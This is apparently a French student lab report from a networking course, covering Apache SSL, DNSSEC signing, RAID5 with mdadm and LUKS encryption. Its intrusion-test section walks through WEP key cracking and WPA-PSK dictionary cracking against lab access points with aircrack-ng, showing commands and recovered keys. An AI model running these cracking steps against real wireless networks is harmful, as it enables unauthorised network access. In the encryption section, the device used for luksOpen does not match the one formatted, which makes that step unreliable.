&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
